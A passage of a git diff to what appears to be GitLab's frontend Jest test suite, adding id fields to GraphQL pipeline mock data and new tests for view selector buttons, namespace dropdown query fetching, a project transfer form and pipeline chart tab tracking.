as selected', () => { + expect(findLayerViewButton().classes('selected')).toBe(true); + }); + + it('shows the Stage button as not selected', () => { + expect(findStageViewButton().exists()).toBe(true); + expect(findStageViewButton().classes('selected')).toBe(false); }); it('shows the Job dependencies (links) toggle', () => { @@ -94,7 +104,7 @@ describe('the graph view selector component', () => { expect(wrapper.emitted().updateViewType).toBeUndefined(); expect(findSwitcherLoader().exists()).toBe(false); - await findStageViewLabel().trigger('click'); + await findStageViewButton().trigger('click'); /* Loading happens before the event is emitted or timers are run. Then we run the timer because the event is emitted in setInterval @@ -123,6 +133,14 @@ describe('the graph view selector component', () => { expect(wrapper.emitted().updateShowLinksState).toHaveLength(1); expect(wrapper.emitted().updateShowLinksState).toEqual([[true]]); }); + + it('does not emit an event if the click occurs on the currently selected view button', async () => { + expect(wrapper.emitted().updateShowLinksState).toBeUndefined(); + + await findLayerViewButton().trigger('click'); + + expect(wrapper.emitted().updateShowLinksState).toBeUndefined(); + }); }); describe('hover tip callout', () => { diff --git a/spec/frontend/pipelines/graph/mock_data.js b/spec/frontend/pipelines/graph/mock_data.js index 3812483766d..dcbbde7bf36 100644 --- a/spec/frontend/pipelines/graph/mock_data.js +++ b/spec/frontend/pipelines/graph/mock_data.js @@ -4,6 +4,7 @@ export const mockPipelineResponse = { data: { project: { __typename: 'Project', + id: '1', pipeline: { __typename: 'Pipeline', id: 163, @@ -21,9 +22,11 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiStage', + id: '2', name: 'build', status: { __typename: 'DetailedStatus', + id: '3', action: null, }, groups: { @@ -31,10 +34,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiGroup', + id: '4', name: 
'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', size: 1, status: { __typename: 'DetailedStatus', + id: '5', label: 'passed', group: 'success', icon: 'status_success', @@ -44,10 +49,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '6', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '7', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -55,6 +62,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '8', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1482/retry', @@ -72,9 +80,11 @@ export const mockPipelineResponse = { { __typename: 'CiGroup', name: 'build_b', + id: '9', size: 1, status: { __typename: 'DetailedStatus', + id: '10', label: 'passed', group: 'success', icon: 'status_success', @@ -84,10 +94,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '11', name: 'build_b', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '12', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -95,6 +107,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '13', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1515/retry', @@ -111,10 +124,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '14', name: 'build_c', size: 1, status: { __typename: 'DetailedStatus', + id: '15', label: 'passed', group: 'success', icon: 'status_success', @@ -124,10 +139,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '16', name: 'build_c', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '17', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -135,6 +152,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + 
id: '18', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1484/retry', @@ -151,10 +169,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '19', name: 'build_d', size: 3, status: { __typename: 'DetailedStatus', + id: '20', label: 'passed', group: 'success', icon: 'status_success', @@ -164,10 +184,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '21', name: 'build_d 1/3', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '22', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -175,6 +197,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '23', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1485/retry', @@ -188,10 +211,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiJob', + id: '24', name: 'build_d 2/3', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '25', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -199,6 +224,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '26', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1486/retry', @@ -212,10 +238,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiJob', + id: '27', name: 'build_d 3/3', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '28', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -223,6 +251,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '29', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1487/retry', @@ -242,9 +271,11 @@ export const mockPipelineResponse = { }, { __typename: 'CiStage', + id: '30', name: 'test', status: { __typename: 'DetailedStatus', + id: '31', action: null, }, groups: { @@ -252,10 +283,12 @@ export const mockPipelineResponse = { nodes: [ { 
__typename: 'CiGroup', + id: '32', name: 'test_a', size: 1, status: { __typename: 'DetailedStatus', + id: '33', label: 'passed', group: 'success', icon: 'status_success', @@ -265,10 +298,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '34', name: 'test_a', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '35', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -276,6 +311,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '36', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1514/retry', @@ -287,14 +323,17 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '37', name: 'build_c', }, { __typename: 'CiBuildNeed', + id: '38', name: 'build_b', }, { __typename: 'CiBuildNeed', + id: '39', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', }, @@ -306,10 +345,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '40', name: 'test_b', size: 2, status: { __typename: 'DetailedStatus', + id: '41', label: 'passed', group: 'success', icon: 'status_success', @@ -319,10 +360,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '42', name: 'test_b 1/2', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '43', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -330,6 +373,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '44', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1489/retry', @@ -341,22 +385,27 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '45', name: 'build_d 3/3', }, { __typename: 'CiBuildNeed', + id: '46', name: 'build_d 2/3', }, { __typename: 'CiBuildNeed', + id: '47', name: 'build_d 1/3', }, { __typename: 'CiBuildNeed', + id: '48', name: 'build_b', }, { __typename: 
'CiBuildNeed', + id: '49', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', }, @@ -365,10 +414,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiJob', + id: '67', name: 'test_b 2/2', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '50', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -376,6 +427,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '51', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1490/retry', @@ -387,22 +439,27 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '52', name: 'build_d 3/3', }, { __typename: 'CiBuildNeed', + id: '53', name: 'build_d 2/3', }, { __typename: 'CiBuildNeed', + id: '54', name: 'build_d 1/3', }, { __typename: 'CiBuildNeed', + id: '55', name: 'build_b', }, { __typename: 'CiBuildNeed', + id: '56', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', }, @@ -415,9 +472,11 @@ export const mockPipelineResponse = { { __typename: 'CiGroup', name: 'test_c', + id: '57', size: 1, status: { __typename: 'DetailedStatus', + id: '58', label: null, group: 'success', icon: 'status_success', @@ -427,10 +486,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '59', name: 'test_c', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '60', icon: 'status_success', tooltip: null, hasDetails: true, @@ -448,9 +509,11 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '61', name: 'test_d', size: 1, status: { + id: '62', __typename: 'DetailedStatus', label: null, group: 'success', @@ -461,10 +524,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '53', name: 'test_d', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '64', icon: 'status_success', tooltip: null, hasDetails: true, @@ -477,6 +542,7 @@ export const mockPipelineResponse = { 
nodes: [ { __typename: 'CiBuildNeed', + id: '65', name: 'build_b', }, ], @@ -502,6 +568,7 @@ export const downstream = { iid: '31', path: '/root/elemenohpee/-/pipelines/175', status: { + id: '70', group: 'success', label: 'passed', icon: 'status_success', @@ -509,6 +576,7 @@ export const downstream = { }, sourceJob: { name: 'test_c', + id: '71', __typename: 'CiJob', }, project: { @@ -525,12 +593,14 @@ export const downstream = { iid: '27', path: '/root/abcd-dag/-/pipelines/181', status: { + id: '72', group: 'success', label: 'passed', icon: 'status_success', __typename: 'DetailedStatus', }, sourceJob: { + id: '73', name: 'test_d', __typename: 'CiJob', }, @@ -551,6 +621,7 @@ export const upstream = { iid: '24', path: '/root/abcd-dag/-/pipelines/161', status: { + id: '74', group: 'success', label: 'passed', icon: 'status_success', @@ -571,6 +642,7 @@ export const wrappedPipelineReturn = { data: { project: { __typename: 'Project', + id: '75', pipeline: { __typename: 'Pipeline', id: 'gid://gitlab/Ci::Pipeline/175', @@ -592,12 +664,14 @@ export const wrappedPipelineReturn = { __typename: 'Pipeline', status: { __typename: 'DetailedStatus', + id: '77', group: 'success', label: 'passed', icon: 'status_success', }, sourceJob: { name: 'test_c', + id: '78', __typename: 'CiJob', }, project: { @@ -613,8 +687,10 @@ export const wrappedPipelineReturn = { { name: 'build', __typename: 'CiStage', + id: '79', status: { action: null, + id: '80', __typename: 'DetailedStatus', }, groups: { @@ -622,8 +698,10 @@ export const wrappedPipelineReturn = { nodes: [ { __typename: 'CiGroup', + id: '81', status: { __typename: 'DetailedStatus', + id: '82', label: 'passed', group: 'success', icon: 'status_success', @@ -635,6 +713,7 @@ export const wrappedPipelineReturn = { nodes: [ { __typename: 'CiJob', + id: '83', name: 'build_n', scheduledAt: null, needs: { @@ -643,6 +722,7 @@ export const wrappedPipelineReturn = { }, status: { __typename: 'DetailedStatus', + id: '84', icon: 'status_success', 
tooltip: 'passed', hasDetails: true, @@ -650,6 +730,7 @@ export const wrappedPipelineReturn = { group: 'success', action: { __typename: 'StatusAction', + id: '85', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/elemenohpee/-/jobs/1662/retry', diff --git a/spec/frontend/pipelines/mock_data.js b/spec/frontend/pipelines/mock_data.js index fdc78d48901..b9d20eb7ca5 100644 --- a/spec/frontend/pipelines/mock_data.js +++ b/spec/frontend/pipelines/mock_data.js @@ -14,6 +14,7 @@ export const mockPipelineHeader = { }, createdAt: threeWeeksAgo.toISOString(), user: { + id: 'user-1', name: 'Foo', username: 'foobar', email: 'foo@bar.com', @@ -27,6 +28,7 @@ export const mockFailedPipelineHeader = { retryable: true, cancelable: false, detailedStatus: { + id: 'status-1', group: 'failed', icon: 'status_failed', label: 'failed', @@ -43,6 +45,7 @@ export const mockFailedPipelineNoPermissions = { }, createdAt: threeWeeksAgo.toISOString(), user: { + id: 'user-1', name: 'Foo', username: 'foobar', email: 'foo@bar.com', @@ -52,6 +55,7 @@ export const mockFailedPipelineNoPermissions = { retryable: true, cancelable: false, detailedStatus: { + id: 'status-1', group: 'running', icon: 'status_running', label: 'running', @@ -66,6 +70,7 @@ export const mockRunningPipelineHeader = { retryable: false, cancelable: true, detailedStatus: { + id: 'status-1', group: 'running', icon: 'status_running', label: 'running', @@ -82,6 +87,7 @@ export const mockRunningPipelineNoPermissions = { }, createdAt: threeWeeksAgo.toISOString(), user: { + id: 'user-1', name: 'Foo', username: 'foobar', email: 'foo@bar.com', @@ -91,6 +97,7 @@ export const mockRunningPipelineNoPermissions = { retryable: false, cancelable: true, detailedStatus: { + id: 'status-1', group: 'running', icon: 'status_running', label: 'running', @@ -105,6 +112,7 @@ export const mockCancelledPipelineHeader = { retryable: true, cancelable: false, detailedStatus: { + id: 'status-1', group: 'cancelled', icon: 'status_cancelled', label: 
'cancelled', @@ -119,6 +127,7 @@ export const mockSuccessfulPipelineHeader = { retryable: false, cancelable: false, detailedStatus: { + id: 'status-1', group: 'success', icon: 'status_success', label: 'success', @@ -130,13 +139,16 @@ export const mockSuccessfulPipelineHeader = { export const mockRunningPipelineHeaderData = { data: { project: { + id: '1', pipeline: { ...mockRunningPipelineHeader, iid: '28', user: { + id: 'user-1', name: 'Foo', username: 'foobar', webPath: '/foo', + webUrl: '/foo', email: 'foo@bar.com', avatarUrl: 'link', status: null, @@ -493,3 +505,132 @@ export const mockSearch = [ export const mockBranchesAfterMap = ['branch-1', 'branch-10', 'branch-11']; export const mockTagsAfterMap = ['tag-3', 'tag-2', 'tag-1', 'main-tag']; + +export const mockPipelineJobsQueryResponse = { + data: { + project: { + id: 'gid://gitlab/Project/20', + __typename: 'Project', + pipeline: { + id: 'gid://gitlab/Ci::Pipeline/224', + __typename: 'Pipeline', + jobs: { + __typename: 'CiJobConnection', + pageInfo: { + endCursor: 'eyJpZCI6Ijg0NyJ9', + hasNextPage: true, + hasPreviousPage: false, + startCursor: 'eyJpZCI6IjYyMCJ9', + __typename: 'PageInfo', + }, + nodes: [ + { + artifacts: { + nodes: [ + { + downloadPath: '/root/ci-project/-/jobs/620/artifacts/download?file_type=trace', + fileType: 'TRACE', + __typename: 'CiJobArtifact', + }, + ], + __typename: 'CiJobArtifactConnection', + }, + allowFailure: false, + status: 'SUCCESS', + scheduledAt: null, + manualJob: false, + triggered: null, + createdByTag: false, + detailedStatus: { + id: 'success-620-620', + detailsPath: '/root/ci-project/-/jobs/620', + group: 'success', + icon: 'status_success', + label: 'passed', + text: 'passed', + tooltip: 'passed (retried)', + action: null, + __typename: 'DetailedStatus', + }, + id: 'gid://gitlab/Ci::Build/620', + refName: 'main', + refPath: '/root/ci-project/-/commits/main', + tags: [], + shortSha: '5acce24b', + commitPath: 
'/root/ci-project/-/commit/5acce24b3737d4f0d649ad0a26ae1903a2b35f5e', + stage: { id: 'gid://gitlab/Ci::Stage/148', name: 'test', __typename: 'CiStage' }, + name: 'coverage_job', + duration: 4, + finishedAt: '2021-12-06T14:13:49Z', + coverage: 82.71, + retryable: false, + playable: false, + cancelable: false, + active: false, + stuck: false, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: true, + __typename: 'JobPermissions', + }, + __typename: 'CiJob', + }, + { + artifacts: { + nodes: [ + { + downloadPath: '/root/ci-project/-/jobs/619/artifacts/download?file_type=trace', + fileType: 'TRACE', + __typename: 'CiJobArtifact', + }, + ], + __typename: 'CiJobArtifactConnection', + }, + allowFailure: false, + status: 'SUCCESS', + scheduledAt: null, + manualJob: false, + triggered: null, + createdByTag: false, + detailedStatus: { + id: 'success-619-619', + detailsPath: '/root/ci-project/-/jobs/619', + group: 'success', + icon: 'status_success', + label: 'passed', + text: 'passed', + tooltip: 'passed (retried)', + action: null, + __typename: 'DetailedStatus', + }, + id: 'gid://gitlab/Ci::Build/619', + refName: 'main', + refPath: '/root/ci-project/-/commits/main', + tags: [], + shortSha: '5acce24b', + commitPath: '/root/ci-project/-/commit/5acce24b3737d4f0d649ad0a26ae1903a2b35f5e', + stage: { id: 'gid://gitlab/Ci::Stage/148', name: 'test', __typename: 'CiStage' }, + name: 'test_job_two', + duration: 4, + finishedAt: '2021-12-06T14:13:44Z', + coverage: null, + retryable: false, + playable: false, + cancelable: false, + active: false, + stuck: false, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: true, + __typename: 'JobPermissions', + }, + __typename: 'CiJob', + }, + ], + }, + }, + }, + }, +}; diff --git a/spec/frontend/projects/new/components/new_project_url_select_spec.js b/spec/frontend/projects/new/components/new_project_url_select_spec.js index b3f177a1f12..258fa7636d4 100644 --- 
a/spec/frontend/projects/new/components/new_project_url_select_spec.js +++ b/spec/frontend/projects/new/components/new_project_url_select_spec.js @@ -5,7 +5,8 @@ import { GlDropdownSectionHeader, GlSearchBoxByType, } from '@gitlab/ui'; -import { createLocalVue, mount, shallowMount } from '@vue/test-utils'; +import { mount, shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import { mockTracking, unmockTracking } from 'helpers/tracking_helper'; @@ -19,6 +20,7 @@ describe('NewProjectUrlSelect component', () => { const data = { currentUser: { + id: 'user-1', groups: { nodes: [ { @@ -51,8 +53,7 @@ describe('NewProjectUrlSelect component', () => { }, }; - const localVue = createLocalVue(); - localVue.use(VueApollo); + Vue.use(VueApollo); const defaultProvide = { namespaceFullPath: 'h5bp', @@ -63,17 +64,19 @@ describe('NewProjectUrlSelect component', () => { userNamespaceId: '1', }; + let mockQueryResponse; + const mountComponent = ({ search = '', queryResponse = data, provide = defaultProvide, mountFn = shallowMount, } = {}) => { - const requestHandlers = [[searchQuery, jest.fn().mockResolvedValue({ data: queryResponse })]]; + mockQueryResponse = jest.fn().mockResolvedValue({ data: queryResponse }); + const requestHandlers = [[searchQuery, mockQueryResponse]]; const apolloProvider = createMockApollo(requestHandlers); return mountFn(NewProjectUrlSelect, { - localVue, apolloProvider, provide, data() { @@ -87,12 +90,19 @@ describe('NewProjectUrlSelect component', () => { const findButtonLabel = () => wrapper.findComponent(GlButton); const findDropdown = () => wrapper.findComponent(GlDropdown); const findInput = () => wrapper.findComponent(GlSearchBoxByType); - const findHiddenInput = () => wrapper.find('input'); + const findHiddenInput = () => wrapper.find('[name="project[namespace_id]"]'); + const clickDropdownItem = async () => { 
wrapper.findComponent(GlDropdownItem).vm.$emit('click'); await wrapper.vm.$nextTick(); }; + const showDropdown = async () => { + findDropdown().vm.$emit('shown'); + await wrapper.vm.$apollo.queries.currentUser.refetch(); + jest.runOnlyPendingTimers(); + }; + afterEach(() => { wrapper.destroy(); }); @@ -140,20 +150,18 @@ describe('NewProjectUrlSelect component', () => { it('focuses on the input when the dropdown is opened', async () => { wrapper = mountComponent({ mountFn: mount }); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); const spy = jest.spyOn(findInput().vm, 'focusInput'); - findDropdown().vm.$emit('shown'); + await showDropdown(); expect(spy).toHaveBeenCalledTimes(1); }); it('renders expected dropdown items', async () => { wrapper = mountComponent({ mountFn: mount }); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + + await showDropdown(); const listItems = wrapper.findAll('li'); @@ -166,15 +174,36 @@ describe('NewProjectUrlSelect component', () => { expect(listItems.at(5).text()).toBe(data.currentUser.namespace.fullPath); }); + describe('query fetching', () => { + describe('on component mount', () => { + it('does not fetch query', () => { + wrapper = mountComponent({ mountFn: mount }); + + expect(mockQueryResponse).not.toHaveBeenCalled(); + }); + }); + + describe('on dropdown shown', () => { + it('fetches query', async () => { + wrapper = mountComponent({ mountFn: mount }); + + await showDropdown(); + + expect(mockQueryResponse).toHaveBeenCalled(); + }); + }); + }); + describe('when selecting from a group template', () => { - const groupId = getIdFromGraphQLId(data.currentUser.groups.nodes[1].id); + const { fullPath, id } = data.currentUser.groups.nodes[1]; beforeEach(async () => { wrapper = mountComponent({ mountFn: mount }); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); - eventHub.$emit('select-template', groupId); + // Show dropdown to fetch projects + await showDropdown(); + + 
eventHub.$emit('select-template', getIdFromGraphQLId(id), fullPath); }); it('filters the dropdown items to the selected group and children', async () => { @@ -187,13 +216,14 @@ describe('NewProjectUrlSelect component', () => { }); it('sets the selection to the group', async () => { - expect(findDropdown().props('text')).toBe(data.currentUser.groups.nodes[1].fullPath); + expect(findDropdown().props('text')).toBe(fullPath); }); }); it('renders `No matches found` when there are no matching dropdown items', async () => { const queryResponse = { currentUser: { + id: 'user-1', groups: { nodes: [], }, @@ -212,12 +242,13 @@ describe('NewProjectUrlSelect component', () => { }); it('emits `update-visibility` event to update the visibility radio options', async () => { - wrapper = mountComponent(); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + wrapper = mountComponent({ mountFn: mount }); const spy = jest.spyOn(eventHub, '$emit'); + // Show dropdown to fetch projects + await showDropdown(); + await clickDropdownItem(); const namespace = data.currentUser.groups.nodes[0]; @@ -231,16 +262,16 @@ describe('NewProjectUrlSelect component', () => { }); it('updates hidden input with selected namespace', async () => { - wrapper = mountComponent(); - jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + wrapper = mountComponent({ mountFn: mount }); + + // Show dropdown to fetch projects + await showDropdown(); await clickDropdownItem(); - expect(findHiddenInput().attributes()).toMatchObject({ - name: 'project[namespace_id]', - value: getIdFromGraphQLId(data.currentUser.groups.nodes[0].id).toString(), - }); + expect(findHiddenInput().attributes('value')).toBe( + getIdFromGraphQLId(data.currentUser.groups.nodes[0].id).toString(), + ); }); it('tracks clicking on the dropdown', () => { diff --git a/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap 
b/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap index be3716c24e6..5ec0ad794fb 100644 --- a/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap +++ b/spec/frontend/projects/pipelines/charts/components/__snapshots__/statistics_list_spec.js.snap @@ -25,9 +25,13 @@ exports[`StatisticsList displays the counts data with labels 1`] = ` Failed: </span> - <strong> - 2 pipelines - </strong> + <gl-link-stub + href="/flightjs/Flight/-/pipelines?page=1&scope=all&status=failed" + > + + 2 pipelines + + </gl-link-stub> </li> <li> <span> diff --git a/spec/frontend/projects/pipelines/charts/components/app_spec.js b/spec/frontend/projects/pipelines/charts/components/app_spec.js index b4067f6a72b..574756322c7 100644 --- a/spec/frontend/projects/pipelines/charts/components/app_spec.js +++ b/spec/frontend/projects/pipelines/charts/components/app_spec.js @@ -1,11 +1,12 @@ import { GlTabs, GlTab } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; import { merge } from 'lodash'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import setWindowLocation from 'helpers/set_window_location_helper'; import { TEST_HOST } from 'helpers/test_constants'; import { mergeUrlParams, updateHistory, getParameterValues } from '~/lib/utils/url_utility'; import Component from '~/projects/pipelines/charts/components/app.vue'; import PipelineCharts from '~/projects/pipelines/charts/components/pipeline_charts.vue'; +import API from '~/api'; jest.mock('~/lib/utils/url_utility'); @@ -17,7 +18,7 @@ describe('ProjectsPipelinesChartsApp', () => { let wrapper; function createComponent(mountOptions = {}) { - wrapper = shallowMount( + wrapper = shallowMountExtended( Component, merge( {}, @@ -118,6 +119,23 @@ describe('ProjectsPipelinesChartsApp', () => { expect(updateHistory).not.toHaveBeenCalled(); }); + + describe('event tracking', () => { + it.each` + testId | event + ${'pipelines-tab'} 
| ${'p_analytics_ci_cd_pipelines'} + ${'deployment-frequency-tab'} | ${'p_analytics_ci_cd_deployment_frequency'} + ${'lead-time-tab'} | ${'p_analytics_ci_cd_lead_time'} + `('tracks the $event event when clicked', ({ testId, event }) => { + jest.spyOn(API, 'trackRedisHllUserEvent'); + + expect(API.trackRedisHllUserEvent).not.toHaveBeenCalled(); + + wrapper.findByTestId(testId).vm.$emit('click'); + + expect(API.trackRedisHllUserEvent).toHaveBeenCalledWith(event); + }); + }); }); describe('when provided with a query param', () => { diff --git a/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js b/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js index 4e79f62ce81..57a864cb2c4 100644 --- a/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js +++ b/spec/frontend/projects/pipelines/charts/components/statistics_list_spec.js @@ -1,3 +1,4 @@ +import { GlLink } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import Component from '~/projects/pipelines/charts/components/statistics_list.vue'; import { counts } from '../mock_data'; @@ -5,8 +6,15 @@ import { counts } from '../mock_data'; describe('StatisticsList', () => { let wrapper; + const failedPipelinesLink = '/flightjs/Flight/-/pipelines?page=1&scope=all&status=failed'; + + const findFailedPipelinesLink = () => wrapper.findComponent(GlLink); + beforeEach(() => { wrapper = shallowMount(Component, { + provide: { + failedPipelinesLink, + }, propsData: { counts, }, @@ -15,10 +23,13 @@ describe('StatisticsList', () => { afterEach(() => { wrapper.destroy(); - wrapper = null; }); it('displays the counts data with labels', () => { expect(wrapper.element).toMatchSnapshot(); }); + + it('displays failed pipelines link', () => { + expect(findFailedPipelinesLink().attributes('href')).toBe(failedPipelinesLink); + }); }); diff --git a/spec/frontend/projects/pipelines/charts/mock_data.js b/spec/frontend/projects/pipelines/charts/mock_data.js index 
2e2c594102c..04971b5b20e 100644 --- a/spec/frontend/projects/pipelines/charts/mock_data.js +++ b/spec/frontend/projects/pipelines/charts/mock_data.js @@ -48,6 +48,7 @@ export const transformedAreaChartData = [ export const mockPipelineCount = { data: { project: { + id: '1', totalPipelines: { count: 34, __typename: 'PipelineConnection' }, successfulPipelines: { count: 23, __typename: 'PipelineConnection' }, failedPipelines: { count: 1, __typename: 'PipelineConnection' }, @@ -70,6 +71,7 @@ export const chartOptions = { export const mockPipelineStatistics = { data: { project: { + id: '1', pipelineAnalytics: { weekPipelinesTotals: [0, 0, 0, 0, 0, 0, 0, 0], weekPipelinesLabels: [ diff --git a/spec/frontend/projects/settings/components/transfer_project_form_spec.js b/spec/frontend/projects/settings/components/transfer_project_form_spec.js new file mode 100644 index 00000000000..f7ce7c6f840 --- /dev/null +++ b/spec/frontend/projects/settings/components/transfer_project_form_spec.js @@ -0,0 +1,68 @@ +import { namespaces } from 'jest/vue_shared/components/namespace_select/mock_data'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import TransferProjectForm from '~/projects/settings/components/transfer_project_form.vue'; +import NamespaceSelect from '~/vue_shared/components/namespace_select/namespace_select.vue'; +import ConfirmDanger from '~/vue_shared/components/confirm_danger/confirm_danger.vue'; + +describe('Transfer project form', () => { + let wrapper; + + const confirmButtonText = 'Confirm'; + const confirmationPhrase = 'You must construct additional pylons!'; + + const createComponent = () => + shallowMountExtended(TransferProjectForm, { + propsData: { + namespaces, + confirmButtonText, + confirmationPhrase, + }, + }); + + const findNamespaceSelect = () => wrapper.findComponent(NamespaceSelect); + const findConfirmDanger = () => wrapper.findComponent(ConfirmDanger); + + beforeEach(() => { + wrapper = createComponent(); + }); + + afterEach(() 
=> { + wrapper.destroy(); + }); + + it('renders the namespace selector', () => { + expect(findNamespaceSelect().exists()).toBe(true); + }); + + it('renders the confirm button', () => { + expect(findConfirmDanger().exists()).toBe(true); + }); + + it('disables the confirm button by default', () => { + expect(findConfirmDanger().attributes('disabled')).toBe('true'); + }); + + describe('with a selected namespace', () => { + const [selectedItem] = namespaces.group; + + beforeEach(() => { + findNamespaceSelect().vm.$emit('select', selectedItem); + }); + + it('emits the `selectNamespace` event when a namespace is selected', () => { + const args = [selectedItem.id]; + + expect(wrapper.emitted('selectNamespace')).toEqual([args]); + }); + + it('enables the confirm button', () => { + expect(findConfirmDanger().attributes('disabled')).toBeUndefined(); + }); + + it('clicking the confirm button emits the `confirm` event', () => { + findConfirmDanger().vm.$emit('confirm'); + + expect(wrapper.emitted('confirm')).toBeDefined(); + }); + }); +}); diff --git a/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js b/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js index 0fd3e7446da..875c58583df 100644 --- a/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js +++ b/spec/frontend/projects/settings_service_desk/components/service_desk_setting_spec.js @@ -1,5 +1,5 @@ import { GlButton, GlDropdown, GlLoadingIcon, GlToggle } from '@gitlab/ui'; -import { shallowMount, mount } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; import { nextTick } from 'vue'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import ServiceDeskSetting from '~/projects/settings_service_desk/components/service_desk_setting.vue'; @@ -11,14 +11,14 @@ describe('ServiceDeskSetting', () => { const findButton = () => wrapper.find(GlButton); const findClipboardButton = () => 
